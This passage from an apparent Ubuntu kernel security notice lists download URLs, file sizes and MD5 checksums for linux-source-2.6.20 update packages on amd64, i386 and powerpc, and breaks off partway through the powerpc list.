http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    50910 e631a706c635587623f8e4343cd782e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   187500 2427fb977faa7812d945e84dffebb1f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    34906 371ac621cc163f1283a7902751a8583e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   644402 dce5458d9ec5d23712c71df24499e92f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   174672 637bb28658492463bddb7f46c4b0c0fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    76424 9b54d7503783fca16bfefa18aa2fd7a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    57878 cdf5165244a3a47a29dedd359e7bf1ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   140050 83dd75c64e81d878e6b656e96d9d4439
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   277462 b5006ab82457b0b74c6454c4d22e074d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:  1905350 1d415f58f530439ac5f51490f417eb28
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.34_amd64.deb
  Size/MD5:   858258 4e0d459249f034b388d7524c3e6c16ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb
  Size/MD5:   858420 4179483fb702bd4cef04b9f6078a2757
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.34_amd64.deb
  Size/MD5:   862708 01d71f8b4722922e179b524675fa1c2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_amd64.deb
  Size/MD5:  8130074 83dcaf7f7e555da5bc1404854ed99fd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.34_amd64.deb
  Size/MD5: 23066730 0334fcbd642e338771023109f5067a1b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.34_amd64.deb
  Size/MD5: 23386230 8846cfc57c9565997449e491ce1b3d58
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.34_amd64.deb
  Size/MD5: 18428504 7d598c9a73f74055615ac8218eb5387b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.34_amd64.deb
  Size/MD5: 18699402 39c306a22805bf6974212e18cfb2fa3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_amd64.deb
  Size/MD5:   668772 34a70f259c72918becac26ad722afd7f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   246426 ec42790e28c6f00318c64b17c429de47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   144478 0c938f3447819c6722f9e58f4bf3de14
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   225116 d687f68a328f16ff4775d7bdc6e3e8f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:  1110522 8f966a2cc693a2f8f4bdbe4a521835d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:  1754786 a35636dc91b7b744d184f63d4e766597
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   140918 834c60d72611bc80799effe4eff27cfd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   163384 6eb7c5ef728d3e5d0691dd988ebd90c9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   265726 c639baa908a1f2d4beaccd72161089f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    34292 7a0ba4ef7bdb5c13fe8f03ba0125662f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    38436 a3817fa7f635d9a01d301ee2029ff04c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    67678 7b0274fcc059bbfb21fc20952e135a83
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    20960 9e84de99755587ca96a142706cd0bedb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:     8324 05b68369ac444eae95b592ea23b6cd77
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    54578 e1941db8408b6c4b463bdaa55b86670c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    86020 ffd93c6cf7aa89815942ed67dcf387dc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   322570 bcac6c4a20f00eaff1a70e8a82b79d17
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:  1046838 46e606e7580618aa35f2966873e6e3f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    43974 0d06666147c779d8696b110ea51c307f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    12016 e71f09e05e8d1b043131ca3dd3ae6036
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    61914 3c5b393e5c46b4e579ce54b7c8a0c4f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:   377812 b1d4ee9bd922cbfad05754df5bd693bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb
  Size/MD5:    66666 978f2be56849ec76ba6fa1108dc7acf6
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb
  Size/MD5: 23126452 433c6213d6ddbaa3866b5d41a95dd11a
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb
  Size/MD5: 18478444 5135e34744d1d42b89a7ac531470f342

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    20314 e0eebf4cc8b2ad8e5934ddbbbee9e67f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    22890 c7da55d48b29becdeea97e5b65efcc5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   210062 912613620e07b25a9ac1e37e1163bde3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   212248 5cc4ecd7bd6e8a0c473fd15876fe3491
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    88688 e53906c8ed25b1422aa45147553ed319
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    35622 36aece0ca9fd7987b512ca2774228a46
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    37730 687f50289011f7f86ecc810d909fabef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    38408 ec8eeaff0c82514dc53866fab80b1a39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    45642 53f8ed8e1f4d2132ca2f420169672627
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    45798 6021a27b11317424bbf3ef3edf05c457
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   179462 a48d2ac3c14b78b32f893aae6d0bca9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   179832 0601087ab9d1a61cdffdc02b0b249588
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    32102 f7785eca40c0aa02246b99907a6a6768
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    32428 9c64b5bbcb7a095bcdfa67010061d9d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   648622 7b3e1c0ffc012d00a62a11bd3ce35cad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   667448 67d08ad30ef8a3157b0cdd64a1314527
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   178182 a7edf7640963b45e899143b71e847675
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   181270 82540ad55623e5bd7ebcf13bb67a1c6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    72390 41eebcd4884e0a906e1f8834cb542636
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    74052 28857b1b544fde323ea0105db9238a8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    53566 dcd7c1d2609d55b6042ff8a0479bcc38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    54778 94e2322def463e0d1ecf327baf65740b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   129214 de8544736aec04cf79fe2cbd11c05fa0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   134886 eb40e81e51a3f5f72baf9da22e5052af
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   275958 c354f73c7348da068d3be4a0ff3e7fc5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   274972 71d5c9ce3443eaaf7dced5a261c2822c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:  1816286 58b6d5fd27f0c2c5fdf3045026d5a9b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:  1886484 21da86216eab2f41f2d92373b45560d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.34_i386.deb
  Size/MD5:   846920 4c3d0f777d35d3cf54cf3067e803432f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.34_i386.deb
  Size/MD5:   850642 b95ffcca084a6e04033441395f2836d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb
  Size/MD5:   847422 2a89ba8097aa9c2d50f88ae1229a442a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb
  Size/MD5:   843400 7e69a21ea4e5628bb56b7e6c17497d87
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.34_i386.deb
  Size/MD5:   837570 08df5ad96399ac2cb8b248b90413ac40
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_i386.deb
  Size/MD5:  8119870 45aa58781c894784b98f37b8945c4eac
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.34_i386.deb
  Size/MD5: 23747632 aaa6ba776d667bd821d404c09ea761f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.34_i386.deb
  Size/MD5: 23814104 9fe91f7a3242641ece3f382676af1eef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb
  Size/MD5: 24376632 850eca8b8584ae7885fac7de41665291
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.34_i386.deb
  Size/MD5: 23866418 08cf06676f400745d293bf0cfe6ae40c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.34_i386.deb
  Size/MD5: 23589054 b3a05427be92591b6d2ece8a7668cc1f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.34_i386.deb
  Size/MD5: 24168224 dddc871c7b897776e3882f481d1fa0e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb
  Size/MD5: 25659442 eea9b0fedc82d6f68dddba4df546a566
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.34_i386.deb
  Size/MD5: 24394132 acb6f49e06b90cc85eac2ae341abee23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_i386.deb
  Size/MD5:   668798 d40b9e7086fc0d42b7de761f94930596
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   244606 f62271f06d0212f827a7d7770a041142
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   250128 d95f6e913380f7128821f6c7b5dd3588
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   132536 2ec726e0c56b255856ca675c582565be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   133074 1da640a801c36aba904b64840a687412
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   213350 8018b90e2791732915721120184869e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   220796 4c3aaff523b464dd26e214047741d1b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:  1110420 e42be64a651baa1ec07cf7b5793a53ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:  1110524 a04cc23e2a0f1627bcd19ee0f4ec8c86
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:  1951334 be7a0897cc1af691a882e676179de046
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:  1974714 323d8b3d45603201e292280087bd1e46
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   149852 b938e982b26c50685e54a71ddfbe9eeb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   142502 f217c35c7e0f8dd8374f7ca5fe81d581
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   160754 f2aceaddb871b3a9149ebc496740d4ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   161954 4e11d0ecd7173f8500d080707c2f0935
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   252934 6a3a035d3e628262838240fdb59579ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   255512 57dc8235378ddacfde72b287c9901b86
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    32758 a946d549be3c05ae6986a91fcbf2265d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    33336 3ee608671c87fb245110138646e52ba8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    38028 faa099182354c2e28582f735d0ede15f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    38306 8d654a49806ba674778f73fbeaa0d259
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    81848 dee99778c5125ddf479770ff8c64ca21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    82092 0f5e88328f6799d422b5487d2fb36bff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    47690 77621576d3fc94d98d635ab517cdfc60
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    47718 846e219e80cc92e7b3f2fa76af3557f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:     8260 fb3750e0c871ed295844c7f7241a4ce9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:     8498 93fccc7acb7a937285bfdeeddd96622b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    49952 83e3c30159a350506cd5189d7bb1c26d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    51866 33d860b297ef1def33cbb0fa5172817b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    78850 741a82d5ea4e6091a635fe30be763753
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    79494 bd0edb4edd76da1b071b023150ddb576
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   322548 b71fab69e39da820f898cb1878ad35f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   322570 a7e794cfb6161a5256dca794d7e40005
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:  1362464 a9c294e1f39df7406b44849dada0005c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:  1347982 bf23b61cec28934833d04a4679588fde
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    42452 1a310e8a7646046983275db34543e5db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    42232 523af84ac476d47d9c4fea45d68212b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    10762 b864a85e1495855ee8ff233509c6fb57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    11398 8a45cdc34f8c06fac6e8e91326b2b376
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    55990 d19d09fd75f8dbce605ffe928d0d8e80
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    56896 89f449de196c1a118243ddda8b2ec461
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:   360274 ee023deb6fa26448e428059797f13182
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:   363220 c1a91e2211c228253b2af991c06ebc12
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb
  Size/MD5:    63168 a98ee6294093b94b35cae56af4bc589a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb
  Size/MD5:    63820 5f6dcc61b08427b55ac502e009474b7f
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb
  Size/MD5: 23844834 9e0480ccd5697b4722a9acc17674daf2
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb
  Size/MD5: 24185156 b5d8d7b87df6d9a22349a68294e6d726

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   328852 425e9ef86c7099ff211795eec55583f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   325586 53f84ffdf949bd1b09c98f4d2d291f2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    41182 f7dd000c829d8bcdd30623e21061c6d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    47456 3b397d1a8b2cc2bfcce9d083b8452e3c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   219678 9e8926372b9689927a497ec32fdd7826
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:   239166 769515e2fc3aeb67ccfe62d709d3bed4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.34_powerpc.udeb
  Size/MD5:    43648 85bdebc413373cb792cb6db76825c726
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.34_powerpc.udeb
